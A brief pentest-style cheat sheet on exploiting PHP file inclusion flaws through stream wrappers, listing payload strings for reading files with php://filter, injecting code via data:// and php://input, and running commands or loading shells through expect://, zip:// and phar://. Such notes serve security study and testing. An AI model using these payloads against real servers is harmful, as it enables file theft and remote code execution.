PHP Wrappers File Inclusion
PHP Wrappers can be used to exploit a LFI/RFI on a server as an alternative to path traversal or similar techniques.
To read a file (encoded as base64): php://filter/read=convert.base64-encode/resource=/path/to/file
To inject some code (encoded as base64):
-
data://text/plain;base64,<base64 php code here>
-
allow_url_include
must be enabled π
To inject some code (as POST data), inject php://input
and use:
$ curl -s -X POST --data '<?php /* code */ ?>' [...]
We can also use some special wrappers:
-
expect://id
: run theid
command, not often installed -
zip://./path/to/shell.zip%23shell.php&cmd=id
: if enabled, we can load a shell inside a zip (.zip extension not mandatory). -
phar://./path/to/shell.phar%2Fshell.php&cmd=id
: if enabled, we can load a shell inside a zip (.phar extension not mandatory).
Refer to payloads to generate phar archives or to write PHP code.